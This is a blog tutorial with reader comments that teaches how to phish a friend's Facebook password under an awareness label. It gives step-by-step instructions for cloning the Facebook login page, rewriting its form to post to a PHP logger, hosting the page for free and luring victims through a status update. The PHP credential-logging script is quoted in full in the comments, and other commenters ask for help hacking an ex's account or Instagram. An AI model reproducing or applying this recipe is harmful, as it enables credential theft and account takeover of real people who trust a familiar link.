Social Engineering, Part 2: Hacking a Friend's Facebook Password

Welcome to the second Null Byte in a series educating you on Social Engineering awareness and techniques. Today, I'm going to show you how a saavy Social Engineer would trick a friend into unknowingly surrendering their Facebook password. My intent is to warn and demonstrate how easy it is to succumb to phishing via Social Engineering, and therefore expose yourself.

What is Phishing?

Phishing is the act of tricking someone into signing onto a fake website, which mimics a real site, such as Facebook. The phishing page will log the credentials that the user enters in the password field, and usually goes unnoticed with the right circumstances and some Social Engineering.

The phishing page is created by visiting the website you want to mock, copying the source HTML code, and then altering it to use a custom PHP script to log the victim's credentials. A good phishing page will seamlessly use cookies to bypass redirect filters. So if a cookie for the site exists, the user will be logged in and more than likely won't realize what happened.

Warnings

  • Phishing is illegal.
  • Only phish your friends who give you consent to do so.

Step 1 Get a Web Host

You need a place to host your phishing page. I like T35—they are free, and offer cPanel hosting.

  1. Make a free account on T35.
  2. Go to your email that you used and click the link confirming the account.

Step 2 Create the Phishing Page

Now we need to create the site that will log the victim's credentials.

  1. Open up a text document using notepad, or your choice in text editors.
  2. Go to the Facebook login page.
  3. Right-click somewhere on the page, and click View page source.
  4. Copy all of the contents of the source code and paste them into your text document.
  5. Hit ctrl + f, and search for "action=" and change the method to "GET", and the text to the right of"action=" to "log.php".
  6. Click File > Save as and save it with the name "index.php" (make sure to click the drop-down menu to select "all files" if it's not selected already).
  7. Make a new text file, and paste this as the contents (paste the raw text, not the numbered). This is the file written in PHP that logs the victim's login details.
  8. Save the file as "log.php". Again, make sure "all files" is selected in the file type drop-down menu.
  9. Log in to your T35 account and click Upload. Upload both files to the root of your website (not in a folder).
  10. When credentials are logged, they will be in a file called "passwords.txt" in the root of your website. Check the box next to the "passwords.txt" file when you get some logs, and click chmod. Change the file to 466 permissions, so other people can't read the victim's passwords.

Step 3 Perform the Phish

In a status update on Facebook, post something like the following:

    "Check out this funny picture of me on my website xD <post link to phishing page here>."

It's really that simple. You should start to see people's login credentials getting stored in your "passwords.txt" file. Simply because it comes from a "trusted" Facebook friend, they will go with their instincts and click the link without thinking twice about it. The best part about that PHP code posted above, is the header sends you back to the Facebook homepage, bypassing the redirect filter warning that Facebook has implemented, which will make it nearly seamless to the user who fell for it.

Start some conversation in the Forums, or IRC channel #nullbytez on FreeNode!

Image by Richzendy

41 Comments

how does "social engineering" defined as disregarding all legal and moral boundries. Why not actually try to make the world a better place rather than teach people how to steal from and manipulate others.

Despite what you may feel, education is the key to defeating this. I would love to live in a world where stores don't need security cameras, but the brutal truth is, con artists are everywhere you look. People will do anything to screw you out of somehting you worked for, I teach you how they do it so you can defend yourself. The bad people already know how to do this.

You have shown people how to create a phishing attack using this method with a stated intention helping people to defend themselves, however you have not outlined how to defend your self clearly against this type of event. If you add that detail in in a manner that is clear and understandable then I think this would be an even more useful post.

There is nothing to add besides a blatent statement of the moral learned in the article. Do not click links that you do not know where they lead, make sure you're at the site you think you are. Theres no tool that will help you from this

He explicitly states that his "intent is to warn and demonstrate how easy it is to succumb to phishing". And he certainly did warn and demonstrate how unbelievably easy it is. I really appreciate this demo because I thought it was much more complicated, and obviously it's not. Alex is making my world a better place by showing me that even a 7yr old could scam me if I don't watch the URLs. Keep teaching, Alex, I'm listening.

Greatly valued comment, thank you.

My ex put this pic of me on Facebook an email can you please help me hack her page .I don't have a page any more I don't want her to have

No, all information is here on this site. Do it yourself.

I did not anything about phishing and stuff like that till I read this article. I would not attempt phishig on anyone and even if would I would asktheir consent i mean my frens of course and try it as a education in that process I would learn a lot and may be next time when I am logging into a website that is phished I would probablly know it. Great article thanks.. :)

I am sorry for my english above I am just too tired of all the night outs for submissions.. I hate sunday nights.. :P

Don't sweat it, glad I can help :)

Are these types of techniques ever used for truly harmless pranking?

I appreciate you showing how easy such a phishing scheme is; it's good to know how and when it's done and it's good to be reminded of it. I always wondered how such a scam was pulled and thought it was much more difficult and time-consuming. Also, the fact that the user doesn't even know it happened is really scary. Isn't there some way that FB would know -- IP address or something like that? Or, when a user hovers over the status update post, would it show a domain other than FB even though it re-directs back to FB?

The user who clicked would see that the address was was different, but most people would ignore it once they landed on the look-alike page. They would think they were just logged out for some reason, which does happen on Facebook.

on top of that, a lot of people don't look at their status bar, and there are also those that choose to hide it. then, when you add in the fact that facebook asks you for your password during seemingly random actions-----POW!

I love reading your posts dude. Very informative indeed!

realy like this, well it is good to be informed and it will help in relationship for bf and gf

Wow.. This blog is Amazing.. Great post !

I'm glad everyone enjoys this! Expect more great stuff to keep on coming.

I've really taken a liking to these social engineering posts. I was just talking to a friend today and his story reminded me of this. He was taking a Calculus test and he knew he was screwed. He went up to one of the girls in his class and said "Hey! The teacher said we could use our notebooks! Make sure your friends know!" She obviously told everyone and when the day of the test came, everyone in class, took out their notebooks. The teacher asked "Did I say you could use your notebooks?" to which the whole class replied "yes?" The teacher had "forgotten" that he told the class this and let them take the test with their notes. My friend is a genius...

That's a really great one :). It's hard to write any more social engineering posts...with the whole legality of things, and some people will just use it for bad stuff. I've got a few great ones too, but it's too risky because it would do more harm than good I think.

It is like the movie "Catch me if you can". Filled with social engineering tricks ;)

Alex, please, gives us food to play and test with and in same time knowledge of the vulnerabilities that exist!

Still got a bunch on the way ;). I strive to have this forum someday to be able to take someone who knows only entry level computers, all the way to a hacker that can do everything on their own. Not "elite", because I will probably never earn that title, but it's what I stive for.

I would live for that day!

Awesome -- I wanna learn!

Wonderful, ty for sharing and as my Grandfather would say - "Locks are for honest people" People who want to get at your things can, they just have to try a little.

Exactly! A cheap lock won't prevent a 200 pound man from kicking a door down if he wants to steal your stuff xD.

By the way i think Alex is right. Once you are told how the attack is done you should figure out how to protect urself.

I was wondering if anyone could tell me, ive been trying this on myself using .biz.nf because the other website is no longer free.....and the problem is that after i enter in the credentials and hit login none of the passwords show up in the directory?

hello, need help in 2 isues:.
i have uploaded both files.

1-but once i sign for credentials, this comes out:
Parse error: syntax error, unexpected TVARIABLE, expecting TSTRING in /home/reve/publichtml/log.php on line 10
(this will be the log.php)
and this is what i copy and paste:

<?php
header("Location: http://www.facebook.com/home.php? ");
$handle = fopen("passwords.txt", "a");
foreach($GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

2- the face book "sign in page", has some letters on the top ( picture atached). how can i move those letters?

plz help me for doing this for instagram

what if i was hosting on a local server??

I've tried this personally. I copied the mobile version source and i tried it on my mobile phone with my personal account. After modifying the method and the rest, the password.txt file wasn't created on my locally hosted server.

there is no folder such as password.txt
when i uploaded files on my5gbfree.com

it won't work. the login form of facebook uses POST method, instead of GET.

when I open t35hosting.com it does not open bt says 403 forbidden??what vmay I do??

Hi,

Can you please tell me after Step-2, Point-8, as i am trying to do the same through Weebly.com, since T35 is no longer a free website hosting site.

Thanks.

Hi,

Can you please tell me after Step-2, Point-8, as i am trying to do the same through Weebly.com, since T35 is no longer a free website hosting site.

Thanks.

So I challenged a friend of mine into making the most realistic version of the page and all that shenanigans, but t35 hosting is down. What's up with that?

Use different hoster, 000webhost did the job for me and its REALLY EASY. The only problem i got is that no "passwords.txt" file is being created, any suggestions?

(oh and i am trying to trick my mom, she doesnt know much of her tablet, and i already know her facebook password becouse i made it for her)

Kai eimai Ellinas!!

Share Your Thoughts

  • Hot
  • Latest